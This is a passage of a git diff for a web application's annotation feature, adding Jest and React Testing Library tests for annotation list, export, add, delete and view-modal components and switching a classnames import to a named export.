, + ) + + const input = screen.getByPlaceholderText('common.operation.search') as HTMLInputElement + fireEvent.change(input, { target: { value: 'updated' } }) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: 'updated' }) + + const clearButton = input.parentElement?.querySelector('div.cursor-pointer') as HTMLElement + fireEvent.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: '' }) + + expect(container).toHaveTextContent(childContent) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.spec.tsx b/web/app/components/app/annotation/header-opts/index.spec.tsx new file mode 100644 index 0000000000..3d8a1fd4ef --- /dev/null +++ b/web/app/components/app/annotation/header-opts/index.spec.tsx @@ -0,0 +1,439 @@ +import * as React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import type { ComponentProps } from 'react' +import HeaderOptions from './index' +import I18NContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { AnnotationItemBasic } from '../type' +import { clearAllAnnotations, fetchExportAnnotationList } from '@/service/annotation' + +jest.mock('@headlessui/react', () => { + type PopoverContextValue = { open: boolean; setOpen: (open: boolean) => void } + type MenuContextValue = { open: boolean; setOpen: (open: boolean) => void } + const PopoverContext = React.createContext(null) + const MenuContext = React.createContext(null) + + const Popover = ({ children }: { children: React.ReactNode | ((props: { open: boolean }) => React.ReactNode) }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {typeof children === 'function' ? children({ open }) : children} + + ) + } + + const PopoverButton = React.forwardRef(({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + }) + + const PopoverPanel = React.forwardRef(({ children, ...props }: { children: React.ReactNode | ((props: { close: () => void }) => React.ReactNode) }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + if (!context?.open) return null + const content = typeof children === 'function' ? children({ close: () => context.setOpen(false) }) : children + return ( +
+ <div ref={ref} {...props}> + {content} + </div>
+ ) + }) + + const Menu = ({ children }: { children: React.ReactNode }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {children} + + ) + } + + const MenuButton = ({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }) => { + const context = React.useContext(MenuContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + } + + const MenuItems = ({ children, ...props }: { children: React.ReactNode }) => { + const context = React.useContext(MenuContext) + if (!context?.open) return null + return ( +
<div {...props}>
+     {children}
+    </div>
+ ) + } + + return { + Dialog: ({ open, children, className }: { open?: boolean; children: React.ReactNode; className?: string }) => { + if (open === false) return null + return ( +
<div className={className}>
+     {children}
+    </div>
+ ) + }, + DialogBackdrop: ({ children, className, onClick }: { children?: React.ReactNode; className?: string; onClick?: () => void }) => ( +
<div className={className} onClick={onClick}>
+     {children}
+    </div>
+ ), + DialogPanel: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
<div className={className} {...props}>
+     {children}
+    </div>
+ ), + DialogTitle: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
<div className={className} {...props}>
+     {children}
+    </div>
+  ),
+  Popover,
+  PopoverButton,
+  PopoverPanel,
+  Menu,
+  MenuButton,
+  MenuItems,
+  Transition: ({ show = true, children }: { show?: boolean; children: React.ReactNode }) => (show ? <>{children}</> : null),
+  TransitionChild: ({ children }: { children: React.ReactNode }) => <>{children}</>,
+ }
+})
+
+let lastCSVDownloaderProps: Record<string, any> | undefined
+const mockCSVDownloader = jest.fn(({ children, ...props }) => {
+ lastCSVDownloaderProps = props
+ return (
<div>
+    {children}
+   </div>
+ ) +}) + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: () => ({ + CSVDownloader: (props: any) => mockCSVDownloader(props), + Type: { Link: 'link' }, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchExportAnnotationList: jest.fn(), + clearAllAnnotations: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type HeaderOptionsProps = ComponentProps + +const renderComponent = ( + props: Partial = {}, + locale: string = LanguagesSupported[0] as string, +) => { + const defaultProps: HeaderOptionsProps = { + appId: 'test-app-id', + onAdd: jest.fn(), + onAdded: jest.fn(), + controlUpdateList: 0, + ...props, + } + + return render( + + + , + ) +} + +const openOperationsPopover = async (user: ReturnType) => { + const trigger = document.querySelector('button.btn.btn-secondary') as HTMLButtonElement + expect(trigger).toBeTruthy() + await user.click(trigger) +} + +const expandExportMenu = async (user: ReturnType) => { + await openOperationsPopover(user) + const exportLabel = await screen.findByText('appAnnotation.table.header.bulkExport') + const exportButton = exportLabel.closest('button') as HTMLButtonElement + expect(exportButton).toBeTruthy() + await user.click(exportButton) +} + +const getExportButtons = async () => { + const csvLabel = await screen.findByText('CSV') + const jsonLabel = await screen.findByText('JSONL') + const csvButton = csvLabel.closest('button') as HTMLButtonElement + const jsonButton = jsonLabel.closest('button') as HTMLButtonElement + expect(csvButton).toBeTruthy() + expect(jsonButton).toBeTruthy() + return { + csvButton, + jsonButton, + } +} + +const clickOperationAction = async ( + user: ReturnType, + translationKey: string, +) => { + const label = await screen.findByText(translationKey) + const button = label.closest('button') as HTMLButtonElement + expect(button).toBeTruthy() + await user.click(button) +} + +const mockAnnotations: AnnotationItemBasic[] = [ + { + question: 'Question 1', + answer: 'Answer 1', + }, +] + +const mockedFetchAnnotations = jest.mocked(fetchExportAnnotationList) +const mockedClearAllAnnotations = jest.mocked(clearAllAnnotations) + +describe('HeaderOptions', () => { + beforeEach(() => { + jest.clearAllMocks() + jest.useRealTimers() + mockCSVDownloader.mockClear() + lastCSVDownloaderProps = undefined + mockedFetchAnnotations.mockResolvedValue({ data: [] }) + }) + + it('should fetch annotations on mount and render enabled export actions when data exist', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + renderComponent() + + await waitFor(() => { + expect(mockedFetchAnnotations).toHaveBeenCalledWith('test-app-id') + }) + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).not.toBeDisabled() + expect(jsonButton).not.toBeDisabled() + + await waitFor(() => { + expect(lastCSVDownloaderProps).toMatchObject({ + bom: true, + filename: 'annotations-en-US', + type: 'link', + data: [ + ['Question', 'Answer'], + ['Question 1', 'Answer 1'], + ], + }) + }) + }) + + it('should disable export actions when there are no annotations', async () => { + const user = userEvent.setup() + renderComponent() + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).toBeDisabled() + expect(jsonButton).toBeDisabled() + + expect(lastCSVDownloaderProps).toMatchObject({ + data: [['Question', 'Answer']], + }) + }) + + it('should open the add annotation modal and forward the onAdd callback', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const onAdd = jest.fn().mockResolvedValue(undefined) + renderComponent({ onAdd }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalled()) + + await user.click( + 
screen.getByRole('button', { name: 'appAnnotation.table.header.addAnnotation' }), + ) + + await screen.findByText('appAnnotation.addModal.title') + const questionInput = screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder') + const answerInput = screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder') + + await user.type(questionInput, 'Integration question') + await user.type(answerInput, 'Integration answer') + await user.click(screen.getByRole('button', { name: 'common.operation.add' })) + + await waitFor(() => { + expect(onAdd).toHaveBeenCalledWith({ + question: 'Integration question', + answer: 'Integration answer', + }) + }) + }) + + it('should allow bulk import through the batch modal', async () => { + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.bulkImport') + + expect(await screen.findByText('appAnnotation.batchModal.title')).toBeInTheDocument() + await user.click( + screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' }), + ) + expect(onAdded).not.toHaveBeenCalled() + }) + + it('should trigger JSONL download with locale-specific filename', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const originalCreateElement = document.createElement.bind(document) + const anchor = originalCreateElement('a') as HTMLAnchorElement + const clickSpy = jest.spyOn(anchor, 'click').mockImplementation(jest.fn()) + const createElementSpy = jest + .spyOn(document, 'createElement') + .mockImplementation((tagName: Parameters[0]) => { + if (tagName === 'a') + return anchor + return originalCreateElement(tagName) + }) + const objectURLSpy = jest + .spyOn(URL, 'createObjectURL') + .mockReturnValue('blob://mock-url') + const revokeSpy = jest.spyOn(URL, 'revokeObjectURL').mockImplementation(jest.fn()) + + renderComponent({}, LanguagesSupported[1] as string) + + await expandExportMenu(user) + + await waitFor(() => expect(mockCSVDownloader).toHaveBeenCalled()) + + const { jsonButton } = await getExportButtons() + await user.click(jsonButton) + + expect(createElementSpy).toHaveBeenCalled() + expect(anchor.download).toBe(`annotations-${LanguagesSupported[1]}.jsonl`) + expect(clickSpy).toHaveBeenCalled() + expect(revokeSpy).toHaveBeenCalledWith('blob://mock-url') + + const blobArg = objectURLSpy.mock.calls[0][0] as Blob + await expect(blobArg.text()).resolves.toContain('"Question 1"') + + clickSpy.mockRestore() + createElementSpy.mockRestore() + objectURLSpy.mockRestore() + revokeSpy.mockRestore() + }) + + it('should clear all annotations when confirmation succeeds', async () => { + mockedClearAllAnnotations.mockResolvedValue(undefined) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalledWith('test-app-id') + expect(onAdded).toHaveBeenCalled() + }) + }) + + it('should handle clear all failures gracefully', async () => { + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + 
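+   // The failure path is expected to log through console.error rather than
+   // calling onAdded, so capture the logger to assert on it and keep test output quiet.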
mockedClearAllAnnotations.mockRejectedValue(new Error('network')) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalled() + expect(onAdded).not.toHaveBeenCalled() + expect(consoleSpy).toHaveBeenCalled() + }) + + consoleSpy.mockRestore() + }) + + it('should refetch annotations when controlUpdateList changes', async () => { + const view = renderComponent({ controlUpdateList: 0 }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(1)) + + view.rerender( + + + , + ) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(2)) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.tsx b/web/app/components/app/annotation/header-opts/index.tsx index 024f75867c..5f8ef658e7 100644 --- a/web/app/components/app/annotation/header-opts/index.tsx +++ b/web/app/components/app/annotation/header-opts/index.tsx @@ -17,7 +17,7 @@ import Button from '../../../base/button' import AddAnnotationModal from '../add-annotation-modal' import type { AnnotationItemBasic } from '../type' import BatchAddModal from '../batch-add-annotation-modal' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import CustomPopover from '@/app/components/base/popover' import { FileDownload02, FilePlus02 } from '@/app/components/base/icons/src/vender/line/files' import { ChevronRight } from '@/app/components/base/icons/src/vender/line/arrows' diff --git a/web/app/components/app/annotation/index.spec.tsx b/web/app/components/app/annotation/index.spec.tsx new file mode 100644 index 0000000000..4971f5173c --- /dev/null +++ b/web/app/components/app/annotation/index.spec.tsx @@ -0,0 +1,233 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import Annotation from './index' +import type { AnnotationItem } from './type' +import { JobStatus } from './type' +import { type App, AppModeEnum } from '@/types/app' +import { + addAnnotation, + delAnnotation, + delAnnotations, + fetchAnnotationConfig, + fetchAnnotationList, + queryAnnotationJobStatus, +} from '@/service/annotation' +import { useProviderContext } from '@/context/provider-context' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { notify: jest.fn() }, +})) + +jest.mock('ahooks', () => ({ + useDebounce: (value: any) => value, +})) + +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + delAnnotation: jest.fn(), + delAnnotations: jest.fn(), + fetchAnnotationConfig: jest.fn(), + editAnnotation: jest.fn(), + fetchAnnotationList: jest.fn(), + queryAnnotationJobStatus: jest.fn(), + updateAnnotationScore: jest.fn(), + updateAnnotationStatus: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./filter', () => ({ children }: { children: React.ReactNode }) => ( +
<div>{children}</div>
+)) + +jest.mock('./empty-element', () => () =>
<div data-testid='empty-element' />) + +jest.mock('./header-opts', () => (props: any) => (
+  <div>
+   <button data-testid='trigger-add' onClick={() => props.onAdd({ question: 'new question', answer: 'new answer' })}>add</button>
+  </div>
+)) + +let latestListProps: any + +jest.mock('./list', () => (props: any) => { + latestListProps = props + if (!props.list.length) + return
<div data-testid='list-empty' />
+  return (
+   <div data-testid='list'>
+    <button data-testid='list-view' onClick={() => props.onView(props.list[0])}>view</button>
+    <button data-testid='list-remove' onClick={() => props.onRemove(props.list[0].id)}>remove</button>
+   </div>
+ ) +}) + +jest.mock('./view-annotation-modal', () => (props: any) => { + if (!props.isShow) + return null + return ( +
<div data-testid='view-modal'>
+   <div>{props.item.question}</div>
+   <button data-testid='view-modal-remove' onClick={() => props.onRemove()}>remove</button>
+   <button data-testid='view-modal-hide' onClick={props.onHide}>hide</button>
+  </div>
+ ) +}) + +jest.mock('@/app/components/base/pagination', () => () =>
<div data-testid='pagination' />) +jest.mock('@/app/components/base/loading', () => () => <div data-testid='loading' />) +jest.mock('@/app/components/base/features/new-feature-panel/annotation-reply/config-param-modal', () => (props: any) => props.isShow ? <div data-testid='config-param-modal' /> : null) +jest.mock('@/app/components/billing/annotation-full/modal', () => (props: any) => props.show ? <div data-testid='annotation-full-modal' />
: null) + +const mockNotify = Toast.notify as jest.Mock +const addAnnotationMock = addAnnotation as jest.Mock +const delAnnotationMock = delAnnotation as jest.Mock +const delAnnotationsMock = delAnnotations as jest.Mock +const fetchAnnotationConfigMock = fetchAnnotationConfig as jest.Mock +const fetchAnnotationListMock = fetchAnnotationList as jest.Mock +const queryAnnotationJobStatusMock = queryAnnotationJobStatus as jest.Mock +const useProviderContextMock = useProviderContext as jest.Mock + +const appDetail = { + id: 'app-id', + mode: AppModeEnum.CHAT, +} as App + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-1', + question: overrides.question ?? 'Question 1', + answer: overrides.answer ?? 'Answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const renderComponent = () => render() + +describe('Annotation', () => { + beforeEach(() => { + jest.clearAllMocks() + latestListProps = undefined + fetchAnnotationConfigMock.mockResolvedValue({ + id: 'config-id', + enabled: false, + embedding_model: { + embedding_model_name: 'model', + embedding_provider_name: 'provider', + }, + score_threshold: 0.5, + }) + fetchAnnotationListMock.mockResolvedValue({ data: [], total: 0 }) + queryAnnotationJobStatusMock.mockResolvedValue({ job_status: JobStatus.completed }) + useProviderContextMock.mockReturnValue({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }) + }) + + it('should render empty element when no annotations are returned', async () => { + renderComponent() + + expect(await screen.findByTestId('empty-element')).toBeInTheDocument() + expect(fetchAnnotationListMock).toHaveBeenCalledWith(appDetail.id, expect.objectContaining({ + page: 1, + keyword: '', + })) + }) + + it('should handle annotation creation and refresh list data', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + addAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + + await screen.findByTestId('list') + fireEvent.click(screen.getByTestId('trigger-add')) + + await waitFor(() => { + expect(addAnnotationMock).toHaveBeenCalledWith(appDetail.id, { question: 'new question', answer: 'new answer' }) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + message: 'common.api.actionSuccess', + type: 'success', + })) + }) + expect(fetchAnnotationListMock).toHaveBeenCalledTimes(2) + }) + + it('should support viewing items and running batch deletion success flow', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + delAnnotationsMock.mockResolvedValue(undefined) + delAnnotationMock.mockResolvedValue(undefined) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + await waitFor(() => { + expect(delAnnotationsMock).toHaveBeenCalledWith(appDetail.id, [annotation.id]) + expect(mockNotify).toHaveBeenCalledWith(expect.objectContaining({ + type: 'success', + })) + expect(latestListProps.selectedIds).toEqual([]) + }) + + fireEvent.click(screen.getByTestId('list-view')) + expect(screen.getByTestId('view-modal')).toBeInTheDocument() + + 
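+   // Removing from the open view modal should flow through the single-item
+   // delete handler, which calls the service with the app id and annotation id.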
await act(async () => { + fireEvent.click(screen.getByTestId('view-modal-remove')) + }) + await waitFor(() => { + expect(delAnnotationMock).toHaveBeenCalledWith(appDetail.id, annotation.id) + }) + }) + + it('should show an error notification when batch deletion fails', async () => { + const annotation = createAnnotation() + fetchAnnotationListMock.mockResolvedValue({ data: [annotation], total: 1 }) + const error = new Error('failed') + delAnnotationsMock.mockRejectedValue(error) + + renderComponent() + await screen.findByTestId('list') + + await act(async () => { + latestListProps.onSelectedIdsChange([annotation.id]) + }) + await waitFor(() => { + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + + await act(async () => { + await latestListProps.onBatchDelete() + }) + + await waitFor(() => { + expect(mockNotify).toHaveBeenCalledWith({ + type: 'error', + message: error.message, + }) + expect(latestListProps.selectedIds).toEqual([annotation.id]) + }) + }) +}) diff --git a/web/app/components/app/annotation/index.tsx b/web/app/components/app/annotation/index.tsx index 32d0c799fc..2d639c91e4 100644 --- a/web/app/components/app/annotation/index.tsx +++ b/web/app/components/app/annotation/index.tsx @@ -25,7 +25,7 @@ import { sleep } from '@/utils' import { useProviderContext } from '@/context/provider-context' import AnnotationFullModal from '@/app/components/billing/annotation-full/modal' import { type App, AppModeEnum } from '@/types/app' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { delAnnotations } from '@/service/annotation' type Props = { diff --git a/web/app/components/app/annotation/list.spec.tsx b/web/app/components/app/annotation/list.spec.tsx new file mode 100644 index 0000000000..9f8d4c8855 --- /dev/null +++ b/web/app/components/app/annotation/list.spec.tsx @@ -0,0 +1,116 @@ +import React from 'react' +import { fireEvent, render, screen, within } from '@testing-library/react' +import List from './list' +import type { AnnotationItem } from './type' + +const mockFormatTime = jest.fn(() => 'formatted-time') + +jest.mock('@/hooks/use-timestamp', () => ({ + __esModule: true, + default: () => ({ + formatTime: mockFormatTime, + }), +})) + +const createAnnotation = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question 1', + answer: overrides.answer ?? 'answer 1', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 
2, +}) + +const getCheckboxes = (container: HTMLElement) => container.querySelectorAll('[data-testid^="checkbox"]') + +describe('List', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render annotation rows and call onView when clicking a row', () => { + const item = createAnnotation() + const onView = jest.fn() + + render( + , + ) + + fireEvent.click(screen.getByText(item.question)) + + expect(onView).toHaveBeenCalledWith(item) + expect(mockFormatTime).toHaveBeenCalledWith(item.created_at, 'appLog.dateTimeFormat') + }) + + it('should toggle single and bulk selection states', () => { + const list = [createAnnotation({ id: 'a', question: 'A' }), createAnnotation({ id: 'b', question: 'B' })] + const onSelectedIdsChange = jest.fn() + const { container, rerender } = render( + , + ) + + const checkboxes = getCheckboxes(container) + fireEvent.click(checkboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a']) + + rerender( + , + ) + const updatedCheckboxes = getCheckboxes(container) + fireEvent.click(updatedCheckboxes[1]) + expect(onSelectedIdsChange).toHaveBeenCalledWith([]) + + fireEvent.click(updatedCheckboxes[0]) + expect(onSelectedIdsChange).toHaveBeenCalledWith(['a', 'b']) + }) + + it('should confirm before removing an annotation and expose batch actions', async () => { + const item = createAnnotation({ id: 'to-delete', question: 'Delete me' }) + const onRemove = jest.fn() + render( + , + ) + + const row = screen.getByText(item.question).closest('tr') as HTMLTableRowElement + const actionButtons = within(row).getAllByRole('button') + fireEvent.click(actionButtons[1]) + + expect(await screen.findByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + const confirmButton = await screen.findByRole('button', { name: 'common.operation.confirm' }) + fireEvent.click(confirmButton) + expect(onRemove).toHaveBeenCalledWith(item.id) + + expect(screen.getByText('appAnnotation.batchAction.selected')).toBeInTheDocument() + }) +}) diff --git a/web/app/components/app/annotation/list.tsx b/web/app/components/app/annotation/list.tsx index 4135b4362e..62a0c50e60 100644 --- a/web/app/components/app/annotation/list.tsx +++ b/web/app/components/app/annotation/list.tsx @@ -7,7 +7,7 @@ import type { AnnotationItem } from './type' import RemoveAnnotationConfirmModal from './remove-annotation-confirm-modal' import ActionButton from '@/app/components/base/action-button' import useTimestamp from '@/hooks/use-timestamp' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import Checkbox from '@/app/components/base/checkbox' import BatchAction from './batch-action' diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + 
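+// With react-i18next mocked above, assertions can target the literal English
+// strings ('Remove annotation?', 'Confirm', 'Cancel') instead of raw i18n keys.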
+describe('RemoveAnnotationConfirmModal', () => {
+ // Rendering behavior driven by isShow and translations
+ describe('Rendering', () => {
+  test('should display the confirm modal when visible', () => {
+   // Arrange
+   render(
+    <RemoveAnnotationConfirmModal isShow onHide={jest.fn()} onRemove={jest.fn()} />,
+   )
+
+   // Assert
+   expect(screen.getByText('Remove annotation?')).toBeInTheDocument()
+   expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument()
+   expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument()
+  })
+
+  test('should not render modal content when hidden', () => {
+   // Arrange
+   render(
+    <RemoveAnnotationConfirmModal isShow={false} onHide={jest.fn()} onRemove={jest.fn()} />,
+   )
+
+   // Assert
+   expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument()
+  })
+ })
+
+ // User interactions with confirm and cancel buttons
+ describe('Interactions', () => {
+  test('should call onHide when cancel button is clicked', () => {
+   const onHide = jest.fn()
+   const onRemove = jest.fn()
+   // Arrange
+   render(
+    <RemoveAnnotationConfirmModal isShow onHide={onHide} onRemove={onRemove} />,
+   )
+
+   // Act
+   fireEvent.click(screen.getByRole('button', { name: 'Cancel' }))
+
+   // Assert
+   expect(onHide).toHaveBeenCalledTimes(1)
+   expect(onRemove).not.toHaveBeenCalled()
+  })
+
+  test('should call onRemove when confirm button is clicked', () => {
+   const onHide = jest.fn()
+   const onRemove = jest.fn()
+   // Arrange
+   render(
+    <RemoveAnnotationConfirmModal isShow onHide={onHide} onRemove={onRemove} />,
+   )
+
+   // Act
+   fireEvent.click(screen.getByRole('button', { name: 'Confirm' }))
+
+   // Assert
+   expect(onRemove).toHaveBeenCalledTimes(1)
+   expect(onHide).not.toHaveBeenCalled()
+  })
+ })
+}) diff --git a/web/app/components/app/annotation/type.ts b/web/app/components/app/annotation/type.ts index 5df6f51ace..e2f2264f07 100644 --- a/web/app/components/app/annotation/type.ts +++ b/web/app/components/app/annotation/type.ts @@ -12,6 +12,12 @@ export type AnnotationItem = { hit_count: number } +export type AnnotationCreateResponse = AnnotationItem & { + account?: { + name?: string + } +} + export type HitHistoryItem = { id: string question: string diff --git a/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx new file mode 100644 index 0000000000..dec0ad0c01 --- /dev/null +++ b/web/app/components/app/annotation/view-annotation-modal/index.spec.tsx @@ -0,0 +1,158 @@ +import React from 'react'
+import { fireEvent, render, screen, waitFor } from '@testing-library/react'
+import ViewAnnotationModal from './index'
+import type { AnnotationItem, HitHistoryItem } from '../type'
+import { fetchHitHistoryList } from '@/service/annotation'
+
+const mockFormatTime = jest.fn(() => 'formatted-time')
+
+jest.mock('@/hooks/use-timestamp', () => ({
+ __esModule: true,
+ default: () => ({
+  formatTime: mockFormatTime,
+ }),
+}))
+
+jest.mock('@/service/annotation', () => ({
+ fetchHitHistoryList: jest.fn(),
+}))
+
+jest.mock('../edit-annotation-modal/edit-item', () => {
+ const EditItemType = {
+  Query: 'query',
+  Answer: 'answer',
+ }
+ return {
+  __esModule: true,
+  default: ({ type, content, onSave }: { type: string; content: string; onSave: (value: string) => void }) => (
<div>
+    <div>{content}</div>
+    <button data-testid={`edit-${type}`} onClick={() => onSave(`${type}-updated`)}>save</button>
+   </div>
+ ), + EditItemType, + } +}) + +const fetchHitHistoryListMock = fetchHitHistoryList as jest.Mock + +const createAnnotationItem = (overrides: Partial = {}): AnnotationItem => ({ + id: overrides.id ?? 'annotation-id', + question: overrides.question ?? 'question', + answer: overrides.answer ?? 'answer', + created_at: overrides.created_at ?? 1700000000, + hit_count: overrides.hit_count ?? 0, +}) + +const createHitHistoryItem = (overrides: Partial = {}): HitHistoryItem => ({ + id: overrides.id ?? 'hit-id', + question: overrides.question ?? 'query', + match: overrides.match ?? 'match', + response: overrides.response ?? 'response', + source: overrides.source ?? 'source', + score: overrides.score ?? 0.42, + created_at: overrides.created_at ?? 1700000000, +}) + +const renderComponent = (props?: Partial>) => { + const item = createAnnotationItem() + const mergedProps: React.ComponentProps = { + appId: 'app-id', + isShow: true, + onHide: jest.fn(), + item, + onSave: jest.fn().mockResolvedValue(undefined), + onRemove: jest.fn().mockResolvedValue(undefined), + ...props, + } + return { + ...render(), + props: mergedProps, + } +} + +describe('ViewAnnotationModal', () => { + beforeEach(() => { + jest.clearAllMocks() + fetchHitHistoryListMock.mockResolvedValue({ data: [], total: 0 }) + }) + + it('should render annotation tab and allow saving updated query', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-query')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith('query-updated', props.item.answer) + }) + }) + + it('should render annotation tab and allow saving updated answer', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByTestId('edit-answer')) + + // Assert + await waitFor(() => { + expect(props.onSave).toHaveBeenCalledWith(props.item.question, 'answer-updated') + }, + ) + }) + + it('should switch to hit history tab and show no data message', async () => { + // Arrange + const { props } = renderComponent() + + await waitFor(() => { + expect(fetchHitHistoryListMock).toHaveBeenCalled() + }) + + // Act + fireEvent.click(screen.getByText('appAnnotation.viewModal.hitHistory')) + + // Assert + expect(await screen.findByText('appAnnotation.viewModal.noHitHistory')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(props.item.created_at, 'appLog.dateTimeFormat') + }) + + it('should render hit history entries with pagination badge when data exists', async () => { + const hits = [createHitHistoryItem({ question: 'user input' }), createHitHistoryItem({ id: 'hit-2', question: 'second' })] + fetchHitHistoryListMock.mockResolvedValue({ data: hits, total: 15 }) + + renderComponent() + + fireEvent.click(await screen.findByText('appAnnotation.viewModal.hitHistory')) + + expect(await screen.findByText('user input')).toBeInTheDocument() + expect(screen.getByText('15 appAnnotation.viewModal.hits')).toBeInTheDocument() + expect(mockFormatTime).toHaveBeenCalledWith(hits[0].created_at, 'appLog.dateTimeFormat') + }) + + it('should confirm before removing the annotation and hide on success', async () => { + const { props } = renderComponent() + + fireEvent.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + expect(await 
